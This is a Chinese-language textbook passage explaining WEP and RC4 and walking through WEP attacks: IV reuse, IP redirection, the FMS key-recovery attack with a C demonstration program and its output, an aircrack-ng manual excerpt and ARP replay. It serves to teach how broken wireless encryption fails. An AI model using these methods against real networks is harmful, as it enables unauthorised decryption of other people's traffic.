当接收方收到一个 WEP 加密的数据包时，过程简单地相反。接收方从消息中提取 IV，然后将 IV 与其自己的 WEP 密钥连接起来，以产生种子值 S。如果发送方和接收方都有相同的 WEP 密钥，种子值将是相同的。这个种子值再次输入到 RC4 中，以产生相同的密钥流，这个密钥流与加密消息的其余部分进行 XOR 运算。这将产生原始的明文消息，由数据包消息 M 和完整性校验和 CS 连接而成。接收方然后使用相同的 CRC32 函数重新计算 M 的校验和，并检查计算值是否与接收到的 CS 值匹配。如果校验和匹配，则数据包被传递。否则，存在过多的传输错误或 WEP 密钥不匹配，数据包将被丢弃。

这基本上就是 WEP 的精髓。

RC4 流密码

RC4 是一个非常简单的算法。它由两个算法组成：密钥调度算法（KSA）和伪随机生成算法（PRGA）。这两个算法都使用一个8-by-8 S-box，这只是一个包含 256 个数字的数组，这些数字都是唯一的，并且数值范围从 0 到 255。简单来说，从 0 到 255 的所有数字都存在于这个数组中，但它们以不同的方式混合在一起。KSA 根据输入的种子值对 S-box 进行初始打乱，种子值可以长达 256 位。

首先，S 盒数组用从 0 到 255 的顺序值填充。这个数组将被恰当地命名为S。然后，另一个 256 字节的数组用种子值填充，必要时重复，直到整个数组被填满。这个数组将被命名为K。然后使用以下伪代码对S数组进行打乱。

j = 0;
for i = 0 to 255
{
  j = (j + S[i] + K[i]) mod 256;
  swap S[i] and S[j];
}

完成这些后，S 盒根据种子值进行混合。这就是密钥调度算法。相当简单。

现在当需要密钥流数据时，使用伪随机生成算法（PRGA）。此算法有两个计数器，i和j，最初都初始化为0。之后，对于每个密钥流字节，使用以下伪代码。

i = (i + 1) mod 256;
j = (j + S[i]) mod 256;
swap S[i] and S[j];
t = (S[i] + S[j]) mod 256;
Output the value of S[t];

S[t]输出的字节是密钥流的第一个字节。此算法会重复用于生成额外的密钥流字节。

RC4 足够简单，可以轻松记忆并在现场实现，如果使用得当，它相当安全。然而，RC4 用于 WEP 的方式存在一些问题。

WEP 攻击

WEP 的安全问题有几个。公平地说，它从未打算成为一个强大的加密协议，而是一种提供有线等效性的方式，正如其缩写词所暗示的。除了与关联和身份相关的安全弱点外，加密协议本身也存在几个问题。其中一些问题源于使用 CRC32 作为消息完整性的校验和函数，而其他问题则源于 IV 的使用方式。

离线暴力破解攻击

暴力破解始终是针对任何计算安全密码系统的可能攻击。唯一剩下的问题是它是否是一种实际可行的攻击。对于 WEP，实际的离线暴力破解方法很简单：捕获几个数据包，然后尝试使用每个可能的关键字解密这些数据包。接下来，重新计算数据包的校验和，并将其与原始校验和进行比较。如果它们匹配，那么这很可能是正确的密钥。通常，这至少需要两个数据包，因为很可能单个数据包可以用无效的密钥解密，但校验和仍然有效。

然而，假设每秒尝试 10,000 次破解，通过 40 位密钥空间进行暴力破解将需要超过三年时间。实际上，现代处理器每秒可以完成超过 10,000 次破解，但即使每秒 200,000 次，这也需要几个月的时间。根据攻击者的资源和投入，这种攻击可能可行也可能不可行。

Tim Newsham 提供了一种有效的破解方法，该方法攻击了大多数 40 位（市场上标称为 64 位）卡和接入点使用的基于密码的密钥生成算法的弱点。他的方法有效地将 40 位密钥空间减少到 21 位，在每秒 10,000 次破解的假设下，可以在几分钟内破解（在现代处理器上只需几秒钟）。有关他的方法的更多信息，请参阅 www.lava.net/~newsham/wlan。

对于 104 位（市场上标称为 128 位）的 WEP 网络，暴力破解根本不可行。

密钥流重复使用

WEP 的另一个潜在问题是密钥流的重复使用。如果两个明文（P）与相同的密钥流进行 XOR 操作以生成两个不同的密文（C），则将这些密文进行 XOR 操作将取消密钥流，导致两个明文相互 XOR。

C[1] = P[1] ⊕ RC4(seed)
C[2] = P[2] ⊕ RC4(seed)
C[1] ⊕ C[2] = [P[1] ⊕ RC4(seed)] ⊕ [P[2] ⊕ RC4(seed)] = P[1] ⊕ P[2]

从这里开始，如果已知其中一个明文，另一个可以轻易恢复。此外，由于在这种情况下明文是具有已知且相当可预测结构的互联网数据包，可以采用各种技术来恢复原始的明文。

初始向量（IV）旨在防止这类攻击；如果没有它，每个数据包都会使用相同的密钥流进行加密。如果为每个数据包使用不同的 IV，则数据包的密钥流也将不同。然而，如果重复使用相同的 IV，则两个数据包都将使用相同的密钥流进行加密。这是一个容易检测的条件，因为 IV 包含在加密数据包的明文中。此外，用于 WEP 的 IV 长度仅为 24 位，这几乎保证了 IV 将被重复使用。假设 IV 是随机选择的，从统计上看，在 5,000 个数据包之后应该会出现密钥流重复的情况。

这个数字看起来出奇的小，是由于一个被称为 生日悖论 的反直觉概率现象。这个悖论表明，如果有 23 个人在同一房间里，其中两个人应该有相同的生日。在 23 个人中，有 (23 · 22) / 2，即 253 种可能的配对。每个配对的成功概率为 1/365，或大约 0.27%，这对应于失败的概率为 1 – (1 / 365)，或大约 99.726%。通过将这个概率提高到 253 次幂，整体失败概率被证明约为 49.95%，这意味着成功的概率略高于 50%。

与 IV 冲突的情况作用相同。在 5,000 个数据包中，有(5000 · 4999) / 2，即 12,497,500，可能的配对。每一对有 1 – (1 / 2²⁴)的失败概率。当这个概率被提升到可能配对的数量时，整体失败概率大约是 47.5%，这意味着在 5,000 个数据包中有 52.5%的几率发生 IV 冲突：

在发现 IV 冲突后，可以通过对明文结构的合理猜测，通过将两个密文进行 XOR 运算来揭示原始明文。此外，如果已知其中一个明文，可以通过简单的 XOR 运算恢复另一个明文。获取已知明文的一种方法可能是通过垃圾邮件，攻击者发送垃圾邮件，受害者通过加密无线连接检查邮件。

基于 IV 的解密字典表

在恢复截获消息的明文后，该 IV 的密钥流也将被知晓。这意味着这个密钥流可以用来解密任何具有相同 IV 的其他数据包，前提是它不比恢复的密钥流长。随着时间的推移，可以创建一个按每个可能的 IV 索引的密钥流表。由于只有 2²⁴个可能的 IV，如果为每个 IV 保存 1,500 字节的密钥流，该表只需要大约 24GB 的存储空间。一旦创建了这样的表，所有后续的加密数据包都可以轻松解密。

实际上，这种攻击方法会非常耗时且繁琐。这是一个有趣的想法，但还有更简单的方法来击败 WEP。

IP 重定向

另一种解密加密数据包的方法是欺骗接入点完成所有工作。通常，无线接入点都有某种形式的互联网连接，如果这种情况成立，则可以进行 IP 重定向攻击。首先，捕获一个加密数据包，并将目标地址更改为攻击者控制的 IP 地址，而不解密数据包。然后，将修改后的数据包发送回无线接入点，它将解密数据包并将其直接发送到攻击者的 IP 地址。

由于 CRC32 校验和是一个线性、无密钥函数，因此可以修改数据包，而校验和仍然相同。

这种攻击还假设已知源和目标 IP 地址。仅基于标准的内部网络 IP 寻址方案，就可以轻松地确定这些信息。此外，由于 IV 冲突导致的密钥流重用的一些案例，也可以用来确定地址。

一旦知道了目标 IP 地址，这个值可以与所需的 IP 地址进行 XOR 运算，然后将整个内容 XOR 到加密数据包中。目标 IP 地址的 XOR 运算将抵消，留下所需的 IP 地址与密钥流进行 XOR 运算。然后，为了确保校验和保持不变，必须策略性地修改源 IP 地址。

例如，假设源地址是 192.168.2.57，目标地址是 192.168.2.1。攻击者控制着地址 123.45.67.89，并希望将流量重定向到那里。这些 IP 地址在数据包中以高 16 位和低 16 位字的形式存在。转换相当简单：

源 IP = 192.168.2.57

SH = 192 · 256 + 168 = 50344
SL = 2 · 256 + 57 = 569

目标 IP = 192.168.2.1

DH = 192 · 256 + 168 = 50344
DL = 2 · 256 + 1 = 513

新 IP = 123.45.67.89

NH = 123 · 256 + 45 = 31533
NL = 67 · 256 + 89 = 17241

校验和将改变为 N[H] + N[L] – D[H] – D[L]，因此这个值必须从数据包的其他地方减去。由于源地址也是已知的并且不是很重要，该 IP 地址的低 16 位字是一个很好的目标：

S'L = SL – (NH + NL – DH – DL)
S'L = 569 – (31533 + 17241 – 50344 – 513)
S'L = 2652

因此，新的源 IP 地址应该是 192.168.10.92。可以在加密数据包中使用相同的 XOR 技巧修改源 IP 地址，然后校验和应该匹配。当数据包发送到无线接入点时，数据包将被解密并发送到 123.45.67.89，攻击者可以从中检索。

如果攻击者恰好有能力监控整个 B 类网络的包，则甚至不需要修改源地址。假设攻击者控制了整个 123.45.X.X IP 范围，IP 地址的低 16 位字可以策略性地选择，以不干扰校验和。如果 NL = DH + DL – NH，校验和将不会改变。

这里有一个例子：

NL = DH + DL – NH*
NL = 50,344 + 513 – 31,533
N'L = 82390

新的目标 IP 地址应该是 123.45.75.124。

Fluhrer, Mantin, and Shamir 攻击

Fluhrer, Mantin, and Shamir (FMS)攻击是对 WEP 最常用的攻击，由 AirSnort 等工具普及。这种攻击实际上非常神奇。它利用了 RC4 密钥调度算法的弱点以及 IVs 的使用。

存在着一些弱的 IV 值，这些值会在密钥流的第一个字节中泄露有关密钥的信息。由于相同的密钥会与不同的 IV 重复使用，如果收集到足够多的具有弱 IV 的包，并且已知密钥流的第一个字节，则可以确定密钥。幸运的是，802.11b 数据包的第一个字节是 snap 头，这几乎总是0xAA。这意味着可以通过将第一个加密字节与0xAA进行 XOR 运算来轻松地获得密钥流的第一个字节。

接下来，需要定位弱 IV。WEP 的 IV 是 24 位，这相当于三个字节。弱 IV 的形式为 (A + 3, N – 1, X)，其中 A 是要攻击的密钥字节，N 是 256（因为 RC4 在模 256 下工作），X 可以是任何值。因此，如果正在攻击密钥流的零字节，将会有 256 个弱 IV，形式为 (3, 255, X)，其中 X 的范围从 0 到 255。密钥流的字节必须按顺序攻击，因此第一个字节不能被攻击，直到零字节已知。

算法本身相当简单。首先，它执行 A + 3 步的密钥调度算法（KSA）。由于初始化向量（IV）将占用 K 数组的第一个三个字节，因此无需知道密钥即可执行此操作。如果已知密钥的零字节且 A 等于 1，则 KSA 可以进行到第四步，因为 K 数组的第一个四个字节将已知。

在这一点上，如果 S[0] 或 S[1] 在上一步被干扰，整个尝试应该被丢弃。更简单地说，如果 j 小于 2，则应该丢弃尝试。否则，取 j 的值和 S[A + 3] 的值，并从第一个密钥流字节中减去这两个值（当然，模 256）。这个值大约有 5% 的时间是正确的密钥字节，并且有不到 95% 的时间是随机的。如果使用足够多的弱 IV（X 的值不同），可以确定正确的密钥字节。需要大约 60 个 IV 才能使概率超过 50%。一旦确定了一个密钥字节，整个过程可以再次进行以确定下一个密钥字节，直到整个密钥被揭示。

为了演示，RC4 将被缩小，使 N 等于 16 而不是 256。这意味着所有操作都是模 16 而不是模 256，所有数组都是 16 个“字节”，由 4 位组成，而不是 256 个实际字节。

假设密钥为 (1, 2, 3, 4, 5)，并且将攻击零字节密钥，A 等于 0。这意味着弱 IV 应该是 (3, 15, X) 的形式。在这个例子中，X 将等于 2，因此种子值将是 (3, 15, 2, 1, 2, 3, 4, 5)。使用这个种子，密钥流的第一个字节将是 9。

输出 = 9
A = 0
IV = 3, 15, 2
密钥 = 1, 2, 3, 4, 5
种子 = IV 与密钥连接
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

由于密钥目前未知，K 数组被加载上目前所知的内容，S 数组被填充为从 0 到 15 的顺序值。然后，j 被初始化为 0，并执行 KSA 的前三个步骤。记住，所有数学运算都是模 16 进行的。

KSA 第一步:

i = 0
j = j + S[i] + K[i]
j = 0 + 0 + 3 = 3
交换 S[i] 和 S[j]
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 3 1 2 0 4 5 6 7 8 9 10 11 12 13 14 15

KSA 第二步:

i = 1
j = j + S[i] + K[i]
j = 3 + 1 + 15 = 3
交换 S[i] 和 S[j]
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 3 0 2 1 4 5 6 7 8 9 10 11 12 13 14 15

KSA 第三步:

i = 2
j = j + S[i] + K[i]
j = 3 + 2 + 2 = 7
交换 S[i] 和 S[j]
K[] = 3 15 2 X X X X X 3 15 2 X X X X X
S[] = 3 0 7 1 4 5 6 2 8 9 10 11 12 13 14 15

到这一点，j不小于 2，因此过程可以继续。S[3]是 1，j是 7，密钥流的第一个字节输出是 9。所以密钥的第一个字节应该是 9 –7 –1 = 1。

此信息可用于确定密钥的下一个字节，使用形式为（4，15，X）的 IV，并通过 KSA 进行到第四步。使用 IV（4，15，9），密钥流的第一个字节是 6。

输出 = 6
A = 0
IV = 4, 15, 9
密钥 = 1, 2, 3, 4, 5
种子 = IV 与密钥连接
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

KSA 第一步:

i = 0
j = j + S[i] + K[i]
j = 0 + 0 + 4 = 4
交换 S[i] 和 S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 1 2 3 0 5 6 7 8 9 10 11 12 13 14 15

KSA 第二步:

i = 1
j = j + S[i] + K[i]
j = 4 + 1 + 15 = 4
交换 S[i] 和 S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 0 2 3 1 5 6 7 8 9 10 11 12 13 14 15

KSA 第三步:

i = 2
j = j + S[i] + K[i]
j = 4 + 2 + 9 = 15
交换 S[i] 和 S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 0 15 3 1 5 6 7 8 9 10 11 12 13 14 2

KSA 第四步:

i = 3
j = j + S[i] + K[i]
j = 15 + 3 + 1 = 3
交换 S[i] 和 S[j]
K[] = 4 15 9 1 X X X X 4 15 9 1 X X X X
S[] = 4 0 15 3 1 5 6 7 8 9 10 11 12 13 14 2
输出 –j – S[4] = key[1]
6 – 3 – 1 = 2

再次，确定了正确的密钥字节。当然，为了演示目的，X的值已被策略性地选择。为了给您一个真正的统计攻击全 RC4 实现的感受，以下源代码已被包含：

fms.c

#include <stdio.h>

/* RC4 stream cipher */
int RC4(int *IV, int *key) {
   int K[256];
   int S[256];
   int seed[16];
   int i, j, k, t;

   //Seed = IV + key;
   for(k=0; k<3; k++)
      seed[k] = IV[k];
   for(k=0; k<13; k++)
      seed[k+3] = key[k];

   // -= Key Scheduling Algorithm (KSA) =-
   //Initialize the arrays.
   for(k=0; k<256; k++) {
      S[k] = k;
      K[k] = seed[k%16];
   }

   j=0;
   for(i=0; i < 256; i++) {
      j = (j + S[i] + K[i])%256;
      t=S[i]; S[i]=S[j]; S[j]=t; // Swap(S[i], S[j]);
   }

   // First step of PRGA for first keystream byte
   i = 0;
   j = 0;

   i = i + 1;
   j = j + S[i];

   t=S[i]; S[i]=S[j]; S[j]=t; // Swap(S[i], S[j]);

   k = (S[i] + S[j])%256;

   return S[k];
}

int main(int argc, char *argv[]) {
  int K[256];
  int S[256];

  int IV[3];
  int key[13] = {1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213};
  int seed[16];
  int N = 256;
  int i, j, k, t, x, A;
  int keystream, keybyte;

  int max_result, max_count;
  int results[256];

  int known_j, known_S;

  if(argc < 2) {
    printf("Usage: %s <keybyte to attack>\n", argv[0]);
    exit(0);
  }
    A = atoi(argv[1]);
    if((A > 12) || (A < 0)) {
      printf("keybyte must be from 0 to 12.\n");
      exit(0);
    }

  for(k=0; k < 256; k++)
    results[k] = 0;

  IV[0] = A + 3;
  IV[1] = N - 1;

  for(x=0; x < 256; x++) {
    IV[2] = x;

    keystream = RC4(IV, key);
    printf("Using IV: (%d, %d, %d), first keystream byte is %u\n",
        IV[0], IV[1], IV[2], keystream);

    printf("Doing the first %d steps of KSA..  ", A+3);

    //Seed = IV + key;
    for(k=0; k<3; k++)
      seed[k] = IV[k];
    for(k=0; k<13; k++)
      seed[k+3] = key[k];

    // -= Key Scheduling Algorithm (KSA) =-
    //Initialize the arrays.
    for(k=0; k<256; k++) {
      S[k] = k;
      K[k] = seed[k%16];
    }

    j=0;
    for(i=0; i < (A + 3); i++) {
      j = (j + S[i] + K[i])%256;
      t = S[i];
      S[i] = S[j];
      S[j] = t;
    }

    if(j < 2) {  // If j < 2, then S[0] or S[1] have been disturbed.
      printf("S[0] or S[1] have been disturbed, discarding..\n");
    } else {
      known_j = j;
      known_S = S[A+3];
      printf("at KSA iteration #%d, j=%d and S[%d]=%d\n",
          A+3, known_j, A+3, known_S);
      keybyte = keystream - known_j - known_S;

      while(keybyte < 0)
        keybyte = keybyte + 256;
      printf("key[%d] prediction = %d - %d - %d = %d\n",
          A, keystream, known_j, known_S, keybyte);
      results[keybyte] = results[keybyte] + 1;
    }
  }
  max_result = -1;
  max_count = 0;

  for(k=0; k < 256; k++) {
    if(max_count < results[k]) {
      max_count = results[k];
      max_result = k;
    }
  }
  printf("\nFrequency table for key[%d] (* = most frequent)\n", A);
  for(k=0; k < 32; k++) {
    for(i=0; i < 8; i++) {
      t = k+i*32;
      if(max_result == t)
        printf("%3d %2d*| ", t, results[t]);
      else
        printf("%3d %2d | ", t, results[t]);
    }
    printf("\n");
  }

  printf("\n[Actual Key] = (");
  for(k=0; k < 12; k++)
    printf("%d, ",key[k]);
  printf("%d)\n", key[12]);

  printf("key[%d] is probably %d\n", A, max_result); 
}

此代码对 128 位 WEP（104 位密钥，24 位 IV）执行 FMS 攻击，使用X的每个可能值。要攻击的密钥字节是唯一的参数，密钥被硬编码到key数组中。以下输出显示了编译和执行 fms.c 代码以破解 RC4 密钥的过程。

reader@hacking:~/booksrc $ gcc -o fms fms.c
reader@hacking:~/booksrc $ ./fms
Usage: ./fms <keybyte to attack>
reader@hacking:~/booksrc $ ./fms 0
Using IV: (3, 255, 0), first keystream byte is 7
Doing the first 3 steps of KSA..  at KSA iteration #3, j=5 and S[3]=1
key[0] prediction = 7 - 5 - 1 = 1
Using IV: (3, 255, 1), first keystream byte is 211
Doing the first 3 steps of KSA..  at KSA iteration #3, j=6 and S[3]=1
key[0] prediction = 211 - 6 - 1 = 204
Using IV: (3, 255, 2), first keystream byte is 241
Doing the first 3 steps of KSA..  at KSA iteration #3, j=7 and S[3]=1
key[0] prediction = 241 - 7 - 1 = 233

.:[ output trimmed ]:.

Using IV: (3, 255, 252), first keystream byte is 175
Doing the first 3 steps of KSA..  S[0] or S[1] have been disturbed, 
discarding..
Using IV: (3, 255, 253), first keystream byte is 149
Doing the first 3 steps of KSA..  at KSA iteration #3, j=2 and S[3]=1
key[0] prediction = 149 - 2 - 1 = 146
Using IV: (3, 255, 254), first keystream byte is 253
Doing the first 3 steps of KSA..  at KSA iteration #3, j=3 and S[3]=2
key[0] prediction = 253 - 3 - 2 = 248
Using IV: (3, 255, 255), first keystream byte is 72
Doing the first 3 steps of KSA..  at KSA iteration #3, j=4 and S[3]=1
key[0] prediction = 72 - 4 - 1 = 67

Frequency table for key[0] (* = most frequent)
  0  1 |  32  3 |  64  0 |  96  1 | 128  2 | 160  0 | 192  1 | 224  3 |
  `1 10*`|  33  0 |  65  1 |  97  0 | 129  1 | 161  1 | 193  1 | 225  0 |
  2  0 |  34  1 |  66  0 |  98  1 | 130  1 | 162  1 | 194  1 | 226  1 |
  3  1 |  35  0 |  67  2 |  99  1 | 131  1 | 163  0 | 195  0 | 227  1 |
  4  0 |  36  0 |  68  0 | 100  1 | 132  0 | 164  0 | 196  2 | 228  0 |
  5  0 |  37  1 |  69  0 | 101  1 | 133  0 | 165  2 | 197  2 | 229  1 |
  6  0 |  38  0 |  70  1 | 102  3 | 134  2 | 166  1 | 198  1 | 230  2 |
  7  0 |  39  0 |  71  2 | 103  0 | 135  5 | 167  3 | 199  2 | 231  0 |
  8  3 |  40  0 |  72  1 | 104  0 | 136  1 | 168  0 | 200  1 | 232  1 |
  9  1 |  41  0 |  73  0 | 105  0 | 137  2 | 169  1 | 201  3 | 233  2 |
 10  1 |  42  3 |  74  1 | 106  2 | 138  0 | 170  1 | 202  3 | 234  0 |
 11  1 |  43  2 |  75  1 | 107  2 | 139  1 | 171  1 | 203  0 | 235  0 |
 12  0 |  44  1 |  76  0 | 108  0 | 140  2 | 172  1 | 204  1 | 236  1 |
 13  2 |  45  2 |  77  0 | 109  0 | 141  0 | 173  2 | 205  1 | 237  0 |
 14  0 |  46  0 |  78  2 | 110  2 | 142  2 | 174  1 | 206  0 | 238  1 |
 15  0 |  47  3 |  79  1 | 111  2 | 143  1 | 175  0 | 207  1 | 239  1 |
 16  1 |  48  1 |  80  1 | 112  0 | 144  2 | 176  0 | 208  0 | 240  0 |
 17  0 |  49  0 |  81  1 | 113  1 | 145  1 | 177  1 | 209  0 | 241  1 |
 18  1 |  50  0 |  82  0 | 114  0 | 146  4 | 178  1 | 210  1 | 242  0 |
 19  2 |  51  0 |  83  0 | 115  0 | 147  1 | 179  0 | 211  1 | 243  0 |
 20  3 |  52  0 |  84  3 | 116  1 | 148  2 | 180  2 | 212  2 | 244  3 |
 21  0 |  53  0 |  85  1 | 117  2 | 149  2 | 181  1 | 213  0 | 245  1 |
 22  0 |  54  3 |  86  3 | 118  0 | 150  2 | 182  2 | 214  0 | 246  3 |
 23  2 |  55  0 |  87  0 | 119  2 | 151  2 | 183  1 | 215  1 | 247  2 |
 24  1 |  56  2 |  88  3 | 120  1 | 152  2 | 184  1 | 216  0 | 248  2 |
 25  2 |  57  2 |  89  0 | 121  1 | 153  2 | 185  0 | 217  1 | 249  3 |
 26  0 |  58  0 |  90  0 | 122  0 | 154  1 | 186  1 | 218  0 | 250  1 |
 27  0 |  59  2 |  91  1 | 123  3 | 155  2 | 187  1 | 219  1 | 251  1 |
 28  2 |  60  1 |  92  1 | 124  0 | 156  0 | 188  0 | 220  0 | 252  3 |
 29  1 |  61  1 |  93  1 | 125  0 | 157  0 | 189  0 | 221  0 | 253  1 |
 30  0 |  62  1 |  94  0 | 126  1 | 158  1 | 190  0 | 222  1 | 254  0 |
 31  0 |  63  0 |  95  1 | 127  0 | 159  0 | 191  0 | 223  0 | 255  0 |

[Actual Key] = (1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213)
`key[0] is probably 1`
reader@hacking:~/booksrc $
reader@hacking:~/booksrc $ ./fms 12
Using IV: (15, 255, 0), first keystream byte is 81
Doing the first 15 steps of KSA..  at KSA iteration #15, j=251 and S[15]=1
key[12] prediction = 81 - 251 - 1 = 85
Using IV: (15, 255, 1), first keystream byte is 80
Doing the first 15 steps of KSA..  at KSA iteration #15, j=252 and S[15]=1
key[12] prediction = 80 - 252 - 1 = 83
Using IV: (15, 255, 2), first keystream byte is 159
Doing the first 15 steps of KSA..  at KSA iteration #15, j=253 and S[15]=1
key[12] prediction = 159 - 253 - 1 = 161

.:[ output trimmed ]:.

Using IV: (15, 255, 252), first keystream byte is 238
Doing the first 15 steps of KSA..  at KSA iteration #15, j=236 and S[15]=1
key[12] prediction = 238 - 236 - 1 = 1
Using IV: (15, 255, 253), first keystream byte is 197
Doing the first 15 steps of KSA..  at KSA iteration #15, j=236 and S[15]=1
key[12] prediction = 197 - 236 - 1 = 216
Using IV: (15, 255, 254), first keystream byte is 238
Doing the first 15 steps of KSA..  at KSA iteration #15, j=249 and S[15]=2
key[12] prediction = 238 - 249 - 2 = 243
Using IV: (15, 255, 255), first keystream byte is 176
Doing the first 15 steps of KSA..  at KSA iteration #15, j=250 and S[15]=1
key[12] prediction = 176 - 250 - 1 = 181

Frequency table for key[12] (* = most frequent)
  0  1 |  32  0 |  64  2 |  96  0 | 128  1 | 160  1 | 192  0 | 224  2 |
  1  2 |  33  1 |  65  0 |  97  2 | 129  1 | 161  1 | 193  0 | 225  0 |
  2  0 |  34  2 |  66  2 |  98  0 | 130  2 | 162  3 | 194  2 | 226  0 |
  3  2 |  35  0 |  67  2 |  99  2 | 131  0 | 163  1 | 195  0 | 227  5 |
  4  0 |  36  0 |  68  0 | 100  1 | 132  0 | 164  0 | 196  1 | 228  1 |
  5  3 |  37  0 |  69  3 | 101  2 | 133  0 | 165  2 | 197  0 | 229  3 |
  6  1 |  38  2 |  70  2 | 102  0 | 134  0 | 166  2 | 198  0 | 230  2 |
  7  2 |  39  0 |  71  1 | 103  0 | 135  0 | 167  3 | 199  1 | 231  1 |
  8  1 |  40  0 |  72  0 | 104  1 | 136  1 | 168  2 | 200  0 | 232  0 |
  9  0 |  41  1 |  73  0 | 105  0 | 137  1 | 169  1 | 201  1 | 233  1 |
 10  2 |  42  2 |  74  0 | 106  4 | 138  2 | 170  0 | 202  1 | 234  0 |
 11  3 |  43  1 |  75  0 | 107  1 | 139  3 | 171  2 | 203  1 | 235  0 |
 12  2 |  44  0 |  76  0 | 108  2 | 140  2 | 172  0 | 204  0 | 236  1 |
 13  0 |  45  0 |  77  0 | 109  1 | 141  1 | 173  0 | 205  2 | 237  4 |
 14  1 |  46  1 |  78  1 | 110  0 | 142  3 | 174  1 | 206  0 | 238  1 |
 15  1 |  47  2 |  79  1 | 111  0 | 143  0 | 175  1 | 207  2 | 239  0 |
 16  2 |  48  0 |  80  1 | 112  1 | 144  3 | 176  0 | 208  0 | 240  0 |
 17  1 |  49  0 |  81  0 | 113  1 | 145  1 | 177  0 | 209  0 | 241  0 |
 18  0 |  50  2 |  82  0 | 114  1 | 146  0 | 178  0 | 210  1 | 242  0 |
 19  0 |  51  0 |  83  4 | 115  1 | 147  0 | 179  1 | 211  4 | 243  2 |
 20  0 |  52  1 |  84  1 | 116  4 | 148  0 | 180  1 | 212  1 | 244  1 |
 21  0 |  53  1 |  85  1 | 117  0 | 149  2 | 181  1 | `213 12*`| 245  1 |
 22  1 |  54  3 |  86  0 | 118  0 | 150  1 | 182  2 | 214  3 | 246  1 |
 23  0 |  55  3 |  87  0 | 119  1 | 151  0 | 183  0 | 215  0 | 247  0 |
 24  0 |  56  1 |  88  0 | 120  0 | 152  2 | 184  0 | 216  2 | 248  0 |
 25  1 |  57  0 |  89  0 | 121  2 | 153  0 | 185  2 | 217  1 | 249  0 |
 26  1 |  58  0 |  90  1 | 122  0 | 154  1 | 186  0 | 218  1 | 250  2 |
 27  2 |  59  1 |  91  1 | 123  0 | 155  1 | 187  1 | 219  0 | 251  2 |
 28  2 |  60  2 |  92  1 | 124  1 | 156  1 | 188  1 | 220  0 | 252  0 |
 29  1 |  61  1 |  93  3 | 125  2 | 157  2 | 189  2 | 221  0 | 253  1 |
 30  0 |  62  1 |  94  0 | 126  0 | 158  1 | 190  1 | 222  1 | 254  2 |
 31  0 |  63  0 |  95  1 | 127  0 | 159  0 | 191  0 | 223  2 | 255  0 |

[Actual Key] = (1, 2, 3, 4, 5, 66, 75, 123, 99, 100, 123, 43, 213)
`key[12] is probably 213`
reader@hacking:~/booksrc $

这种攻击如此成功，以至于如果你期望任何形式的安全，就应该使用名为 WPA 的新无线协议。然而，仍然有大量无线网络仅由 WEP 保护。如今，有相当稳健的工具可以执行 WEP 攻击。一个值得注意的例子是 aircrack，它已被包含在 LiveCD 中；然而，它需要无线硬件，你可能没有。关于如何使用这个工具的文档非常丰富，而且这个工具正在不断开发中。第一份手册应该能帮助你入门。

AIRCRACK-NG(1)                                                   AIRCRACK-NG(1)

NAME
       aircrack-ng is a 802.11 WEP / WPA-PSK key cracker.

SYNOPSIS
       aircrack-ng [options] <.cap / .ivs file(s)>

DESCRIPTION
       aircrack-ng is a 802.11 WEP / WPA-PSK key cracker. It implements the so-
       called Fluhrer - Mantin - Shamir (FMS) attack, along with some new attacks
       by a talented hacker named KoreK. When enough encrypted packets have been
       gathered, aircrack-ng can almost instantly recover the WEP key.

OPTIONS
       Common options:

       -a <amode>
              Force the attack mode, 1 or wep for WEP and 2 or wpa for WPA-PSK.

       -e <essid>
              Select the target network based on the ESSID. This option is also
              required for WPA cracking if the SSID is cloacked.

再次提醒，对于硬件问题，请咨询互联网。这个程序普及了一种用于收集 IVs 的巧妙技术。等待从数据包中收集足够的 IVs 可能需要数小时，甚至数天。但由于无线仍然是一个网络，会有 ARP 流量。由于 WEP 加密不会修改数据包的大小，因此很容易识别出哪些是 ARP。这种攻击捕获了一个大小与 ARP 请求相同的数据包，然后将其在网络中重放数千次。每次，数据包都会被解密并发送到网络，同时发送一个相应的 ARP 回复。这些额外的回复不会损害网络；然而，它们确实生成了一个新的 IV 的新数据包。通过这种刺激网络的技术，只需几分钟就可以收集到足够破解 WEP 密钥的 IV。

第 0x800 章。结论

黑客通常是一个被误解的话题，媒体喜欢夸大其词，这只会加剧这种状况。术语的变化大多无效——需要的是思维方式的改变。黑客只是具有创新精神和深厚技术知识的人。黑客不一定是罪犯，尽管只要犯罪有赚钱的潜力，就总会有一些黑客是罪犯。黑客知识本身并没有错，尽管它有潜在的应用。

无论你是否喜欢，世界每天依赖的软件和网络中确实存在漏洞。这仅仅是软件开发快速步伐的必然结果。新的软件通常一开始很成功，即使存在漏洞。这种成功意味着金钱，这吸引了那些学会如何利用这些漏洞以获取经济利益的人。这似乎会是一个无休止的恶性循环，但幸运的是，发现软件漏洞的所有人并不只是追求利润的恶意罪犯。这些人都是黑客，每个人都有自己的动机；有些人被好奇心驱使，其他人因工作而获得报酬，还有一些人只是喜欢挑战，还有一些人实际上就是罪犯。这些人中的大多数并没有恶意意图；相反，他们帮助供应商修复他们有漏洞的软件。没有黑客，软件中的漏洞和漏洞就会一直未被发现。不幸的是，法律体系在技术方面进展缓慢且大多无知。通常，会通过严厉的法律和过长的刑期来试图吓唬人们不要仔细查看。这是一种幼稚的逻辑——阻止黑客探索和寻找漏洞并不能解决问题。说服每个人都相信皇帝穿着华丽的衣服并不能改变他赤身裸体的现实。未被发现的安全漏洞只是等待着比普通黑客更恶毒的人来发现。软件漏洞的危险在于其有效载荷可以是任何东西。与这些法律如此害怕的恐怖主义情景相比，复制互联网蠕虫相对无害。用法律限制黑客可能会使最坏的情况更有可能发生，因为它留下了更多未被发现的漏洞，这些漏洞可以被不受法律约束并想造成真正破坏的人利用。

